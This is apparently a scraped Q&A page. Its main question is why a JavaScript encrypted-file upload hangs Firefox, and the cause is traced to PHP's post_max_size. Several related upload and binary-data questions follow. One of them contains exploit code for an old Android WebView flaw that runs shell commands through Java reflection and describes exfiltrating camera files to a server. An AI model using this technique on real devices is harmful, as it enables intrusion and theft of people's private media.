How to send binary file to the server using JavaScript - javascript

I'm working on file encryption for my messenger and I'm struggling with uploading the file after encryption is done.
The encryption seems fine in terms of performance, but when I try to make an upload, the browser hangs completely. Profiler writes "small GC" events infinitely, and the yellow bar about the hung up script is appearing every 10 seconds.
What I already tried:
Read the file with FileReader to ArrayBuffer, then turn it into a basic Array, encrypt it, then create a FormData object, create a File from the data, append it to FormData and send. It worked fast with original, untouched file around 1.3 Mb in size when I did not do the encryption, but on the encrypted "fake" File object after upload I get file with 4.7 Mb and it was not usable.
Send as a plain POST field (multipart formdata encoding). The data is corrupted after it is saved on PHP this way.
Send as a Base64-encoded POST field. Finally it started working this way after I found a fast converting function from binary array to Base64 string. btoa() gave wrong results after encode/decode. But after I tried a file of 8.5 Mb in size, it hung again.
I tried moving extra data to URL string and send file as Blob as described here. No success, browser still hangs.
I tried passing to Blob constructor a basic Array, a Uint8Array made of it, and finally I tried to send File as suggested in docs, but still the same result, even with small file.
What is wrong with the code? HDD load is 0% when this hang happens. Also the files in question are really very small
Here is what I get on the output from my server script when I emergency terminate the JS script by pressing the button:
Warning: Unknown: POST Content-Length of 22146226 bytes exceeds the limit of 8388608 bytes in Unknown on line 0
Warning: Cannot modify header information - headers already sent in Unknown on line 0
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent in D:\xmessenger\upload.php on line 2
Array ( )
Here is my JavaScript:
function uploadEncryptedFile(nonce) {
if (typeof window['FormData'] !== 'function' || typeof window['File'] !== 'function') return
var file_input = document.getElementById('attachment')
if (!file_input.files.length) return
var file = file_input.files[0]
var reader = new FileReader();
reader.addEventListener('load', function() {
var data = Array.from(new Uint8Array(reader.result))
var encrypted = encryptFile(data, nonce)
//return //Here it never hangs
var form_data = new FormData()
form_data.append('name', file.name)
form_data.append('type', file.type)
form_data.append('attachment', arrayBufferToBase64(encrypted))
/* form_data.append('attachment', btoa(encrypted)) // Does not help */
form_data.append('nonce', nonce)
var req = getXmlHttp()
req.open('POST', 'upload.php?attachencryptedfile', true)
req.onload = function() {
var data = req.responseText.split(':')
document.getElementById('filelist').lastChild.realName = data[2]
document.getElementById('progress2').style.display = 'none'
document.getElementById('attachment').onclick = null
encryptFilename(data[0], data[1], data[2])
}
req.send(form_data)
/* These lines also fail when the file is larger */
/* req.send(new Blob(encrypted)) */
/* req.send(new Blob(new Uint8Array(encrypted))) */
})
reader.readAsArrayBuffer(file)
}
function arrayBufferToBase64(buffer) {
var binary = '';
var bytes = new Uint8Array(buffer);
var len = bytes.byteLength;
for (var i = 0; i < len; i++) {
binary += String.fromCharCode(bytes[i]);
}
return window.btoa(binary);
}
Here is my PHP handler code:
if (isset($_GET['attachencryptedfile'])) {
$entityBody = file_get_contents('php://input');
if ($entityBody == '') exit(print_r($_POST, true));
else exit($entityBody);
if (!isset($_POST["name"])) exit("Error");
$name = #preg_replace("/[^0-9A-Za-z._-]/", "", $_POST["name"]);
$nonce = #preg_replace("/[^0-9A-Za-z+\\/]/", "", $_POST["nonce"]);
if ($name == ".htaccess") exit();
$data = base64_decode($_POST["attachment"]);
//print_r($_POST);
//exit();
if (strlen($data)>1024*15*1024) exit('<script type="text/javascript">parent.showInfo("Файл слишком большой"); parent.document.getElementById(\'filelist\').removeChild(parent.document.getElementById(\'filelist\').lastChild); parent.document.getElementById(\'progress2\').style.display = \'none\'; parent.document.getElementById(\'attachment\').onclick = null</script>');
$uname = uniqid()."_".str_pad($_SESSION['xm_user_id'], 6, "0", STR_PAD_LEFT).substr($name, strrpos($name, "."));
file_put_contents("upload/".$uname, $data);
mysql_query("ALTER TABLE `attachments` AUTO_INCREMENT=0");
mysql_query("INSERT INTO `attachments` VALUES('0', '".$uname."', '".$name."', '0', '".$nonce."')");
exit(mysql_insert_id().":".$uname.":".$name);
}
HTML form:
<form name="fileForm" id="fileForm" method="post" enctype="multipart/form-data" action="upload.php?attachfile" target="ifr">
<div id="fileButton" title="Прикрепить файл" onclick="document.getElementById('attachment').click()"></div>
<input type="file" name="attachment" id="attachment" title="Прикрепить файл" onchange="addFile()" />
</form>

UPD: the issue is not solved, unfortunately. My answer is only partially correct. Now I made a silly mistake in the code (forgot to update the server side), and I found another cause of possible hang. If I submit a basic POST form (x-www-urlencoded) and code in the PHP script tries to execute this line ($uname is defined, $_FILES is an empty array)
if (!copy($_FILES['attachment']['tmp_name'], "upload/".$uname)) exit("Error");
then the whole thing hangs again. If I terminate the script, the server response is code 200, and the body contents are just fine (I have error output on on my dev machine). I know it is a bad thing - calling copy with the first argument which is undefined at all, but even server error 500 must not hang the browser in such a way (btw, new latest version of Firefox is also affected).
I have Apache 2.4 on Windows 7 x64 and PHP 5.3. Can someone please verify this thing? Maybe a bug should be filed to Apache/Firefox team?
Oh my God. This terrible behavior was caused by... post_max_size = 8M set in php.ini. And files smaller than 8 Mb actually did not hang the browser, as I figured it out.
Last question is - why? Why cannot Apache/PHP (I have Apache 2.4 btw, it is not old) somehow gracefully abort the connection, telling the browser that the limit is exceeded? Or maybe it is a bug in XHR implementation, and is not applicable to basic form submit. Anyway, will be useful for people who stumble upon it.
By the way, I tried it in Chrome with the same POST size limit, and it does not hang there completely like in Firefox (the request is still in some hung up condition with "no response available", but the JS engine and the UI are not blocked ).

Related

Running into a 1.7mb limit with CSOM based upload functionality

Running into the following error when I try to upload files larger than 1.7 MB:
"Request failed with error message - The request message is too big. The server does not allow messages larger than 2097152 bytes. . Stack Trace - undefined"
function uploadFile(arrayBuffer, fileName)
{
//Get Client Context,Web and List object.
var clientContext = new SP.ClientContext();
var oWeb = clientContext.get_web();
var oList = oWeb.get_lists().getByTitle('CoReTranslationDocuments');
var bytes = new Uint8Array(arrayBuffer);
var i, length, out = '';
for (i = 0, length = bytes.length; i < length; i += 1)
{
out += String.fromCharCode(bytes[i]);
}
var base64 = btoa(out);
var createInfo = new SP.FileCreationInformation();
createInfo.set_content(base64);
createInfo.set_url(fileName);
var uploadedDocument = oList.get_rootFolder().get_files().add(createInfo);
clientContext.load(uploadedDocument);
clientContext.executeQueryAsync(QuerySuccess, QueryFailure);
}
We just switched from SP2013 to Sharepoint Online. This code worked well with even larger files previously. Does the 2MB limit refer to the file being uploaded or the size of the REST request?
I also did read about a possible solution using filestream - is that something I can use in this scenario?
Any suggestions/ modifications to the code will be much appreciated.
SharePoint has its own limits for CSOM. Unfortunately, these limits cannot be configured in Central Administration and also cannot be set using CSOM for obvious reasons.
When googling for the issue, mostly a solution is given by setting the ClientRequestServiceSettings.MaxReceivedMessageSize property to the desired size.
Call the following PowerShell script from SharePoint Management Shell :
$ws = [Microsoft.SharePoint.Administration.SPWebService]::ContentService
$ws.ClientRequestServiceSettings.MaxReceivedMessageSize = 209715200
$ws.Update()
This will set the limit to 200 MB.
However, in SharePoint 2013 Microsoft apparently added another configuration setting to also limit the amount of data which the server shall process from a CSOM request (Why anyone would configure this one differently is beyond me...). After reading a very, very long SharePoint Log file and crawling through some disassembled SharePoint server code, I found that this parameter can be set via the property ClientRequestServiceSettings.MaxParseMessageSize.
We are now using the following script with SharePoint 2013 and it works great:
$ws = [Microsoft.SharePoint.Administration.SPWebService]::ContentService
$ws.ClientRequestServiceSettings.MaxReceivedMessageSize = 209715200
$ws.ClientRequestServiceSettings.MaxParseMessageSize = 209715200
$ws.Update()
Hope that saves some people a headache!

How to message child process in Firefox add-on like Chrome native messaging

I am trying to emulate Chrome's native messaging feature using Firefox's add-on SDK. Specifically, I'm using the child_process module along with the emit method to communicate with a python child process.
I am able to successfully send messages to the child process, but I am having trouble getting messages sent back to the add-on. Chrome's native messaging feature uses stdin/stdout. The first 4 bytes of every message in both directions represents the size in bytes of the following message so the receiver knows how much to read. Here's what I have so far:
Add-on to Child Process
var utf8 = new TextEncoder("utf-8").encode(message);
var latin = new TextDecoder("latin1").decode(utf8);
emit(childProcess.stdin, "data", new TextDecoder("latin1").decode(new Uint32Array([utf8.length])));
emit(childProcess.stdin, "data", latin);
emit(childProcess.stdin, "end");
Child Process (Python) from Add-on
text_length_bytes = sys.stdin.read(4)
text_length = struct.unpack('i', text_length_bytes)[0]
text = sys.stdin.read(text_length).decode('utf-8')
Child Process to Add-on
sys.stdout.write(struct.pack('I', len(message)))
sys.stdout.write(message)
sys.stdout.flush()
Add-on from Child Process
This is where I'm struggling. I have it working when the length is less than 255. For instance, if the length is 55, this works:
childProcess.stdout.on('data', (data) => { // data is '7' (55 UTF-8 encoded)
var utf8Encoded = new TextEncoder("utf-8).encode(data);
console.log(utf8Encoded[0]); // 55
}
But, like I said, it does not work for all numbers. I'm sure I have to do something with TypedArrays, but I'm struggling to put everything together.
The problem here, is that Firefox is trying to read stdout as UTF-8 stream by default. Since UTF-8 doesn't use the full first byte, you get corrupted characters for example for 255. The solution is to tell Firefox to read in binary encoding, which means you'll have to manually parse the actual message content later on.
var childProcess = spawn("mybin", [ '-a' ], { encoding: null });
Your listener would then work like
var decoder = new TextDecoder("utf-8");
var readIncoming = (data) => {
// read the first four bytes, which indicate the size of the following message
var size = (new Uint32Array(data.subarray(0, 4).buffer))[0];
//TODO: handle size > data.byteLength - 4
// read the message
var message = decoder.decode(data.subarray(4, size));
//TODO: do stuff with message
// Read the next message if there are more bytes.
if(data.byteLength > 4 + size)
readIncoming(data.subarray(4 + size));
};
childProcess.stdout.on('data', (data) => {
// convert the data string to a byte array
// The bytes got converted by char code, see https://dxr.mozilla.org/mozilla-central/source/addon-sdk/source/lib/sdk/system/child_process/subprocess.js#357
var bytes = Uint8Array.from(data, (c) => c.charCodeAt(0));
readIncoming(bytes);
});
Maybe is this similar to this problem:
Chrome native messaging doesn't accept messages of certain sizes (Windows)
Windows-only: Make sure that the program's I/O mode is set to O_BINARY. By default, the I/O mode is O_TEXT, which corrupts the message format as line breaks (\n = 0A) are replaced with Windows-style line endings (\r\n = 0D 0A). The I/O mode can be set using __setmode.

Handle the output of 'cat example.png' in JS

I am trying, out of interest, to do some remote code execution on my old Android phone. On old versions of the Android "WebView" component, there is a vulnerability that makes it possible to execute shell code and read the response via JS. The relevant code, taken from here, looks like this:
function execute(cmdArgs)
{
return SmokeyBear.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
function getContents(inputStream)
{
var contents = "";
var b = inputStream.read();
while(b != -1) {
var bString = String.fromCharCode(b);
contents += bString;
b = inputStream.read();
}
return contents;
}
[...]
var p = execute(["ls","/mnt/sdcard/DCIM/Camera/"]);
input = getContents(p.getInputStream());
In this example, we list the files in the Camera folder and store them into 'input' as a string, which worked fine for me.
I have read however that the same vulnerability could be used to exfiltrate whole media files. The problem is that I do not know what type of data I get if I just remote-execute 'cat /path/to/example.png' on the phone. I want to submit the data to my (Python) web server. I tried running the above code, converting the bytes to a string (which contains a lot of gibberish), send the string via an XMLHttpRequest, then on my server just save that string to a binary file. That didn't work, obviously. I strongly suspect I should base64 encode the whole thing before transmission, but I don't even know how to retrieve the raw byte array from p.getInputStream() . It doesn't help that google doesn't give me any meaningful results for 'javascript inputstream' at all ...

AJAX Upload file straight after downloading it (without storing)

I'm making a JavaScript script that is going to essentially save an old game development sandbox website before the owners scrap it (and lose all of the games). I've created a script that downloads each game via AJAX, and would like to somehow upload it straight away, also using AJAX. How do I upload the downloaded file (that's stored in responseText, presumably) to a PHP page on another domain (that has cross origin headers enabled)?
I assume there must be a way of uploading the data from the first AJAX request, without transferring the responseText to another AJAX request (used to upload the file)? I've tried transferring the data, but as expected, it causes huge lag (and can crash the browser), as the files can be quite large.
Is there a way that an AJAX request can somehow upload individual packets as soon as they're recieved?
Thanks,
Dan.
You could use Firefox' moz-chunked-text and moz-chunked-arraybuffer response types. On the JavaScript side you can do something like this:
function downloadUpload() {
var downloadUrl = "server.com/largeFile.ext";
var uploadUrl = "receiver.net/upload.php";
var dataOffset = 0;
xhrDownload = new XMLHttpRequest();
xhrDownload.open("GET", downloadUrl, true);
xhrDownload.responseType = "moz-chunked-text"; // <- only works in Firefox
xhrDownload.onprogress = uploadData;
xhrDownload.send();
function uploadData() {
var data = {
file: downloadUrl.substring(downloadUrl.lastIndexOf('/') + 1),
offset: dataOffset,
chunk: xhrDownload.responseText
};
xhrUpload = new XMLHttpRequest();
xhrUpload.open("POST", uploadUrl, true);
xhrUpload.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');
xhrUpload.send(JSON.stringify(data));
dataOffset += xhrDownload.responseText.length;
};
}
On the PHP side you need something like this:
$in = fopen("php://input", "r");
$postContent = stream_get_contents($in);
fclose($in);
$o = json_decode($postContent);
file_put_contents($o->file . '-' . $o->offset . '.txt', $o->chunk);
These snippets will just give you the basic idea, you'll need to optimize the code yourself.

How to upload a binary file in IE8 then send it to server using xmlhttprequest

I'm working on the web pages of an embeded device. To exchange data between the web page and the application of this device I use xmlhttprequest.
Now I search a way to allow the client to upload a binary (to update the firmware of that device) to the server.
One big limitation : it needs to works in IE8 (a cross browser solution would be ideal, but it's mandatory to work on IE8 first...)
In detail what I have to do :
Use the <input type='file'> to select the file on the client computer
Send the file (using xmlhttprequest?) to the server
The server will reassemble the file and to whatever it need to do with it...
I was able to get a binary from the client to the server in chrome, but in IE8, my method was not compatible.
The relevant html file :
<input id="uploadFile" type="file" />
In the javascript, I tried different way to fire an event with the input file type
// does not work in IE8 (get an Obj doesnt support this property or method)
document.querySelector('input[type="file"]').addEventListener("change"),function(e)...
// tried with jQuery, does not work in IE8(I may not using it correctly...)
$('upload').addEvent('change', function(e)....
$('upload').change(function(e)....
So my first problem is : how to do a onChange event with the input type file in IE8?
Also the method I was using in chrome (found on this page : http://www.html5rocks.com/en/tutorials/file/xhr2/ ) but that is not working on IE8 :
function upload(blobOrFile) {
var xhr = new XMLHttpRequest();
xhr.open('POST', '/server', true);
xhr.onload = function(e) { ... };
xhr.send(blobOrFile);
}
document.querySelector('input[type="file"]').addEventListener('change', function(e) {
var blob = this.files[0];
const BYTES_PER_CHUNK = 1024 * 1024; // 1MB chunk sizes.
const SIZE = blob.size;
var start = 0;
var end = BYTES_PER_CHUNK;
while(start < SIZE) {
upload(blob.slice(start, end));
start = end;
end = start + BYTES_PER_CHUNK;
}
}, false);
})();
Because the document.querySelector generate an error in IE8, I don't know if the rest of this code works in IE8 (I wish it can works!)
Any help and suggestion will be greatly appreciated!!!

Categories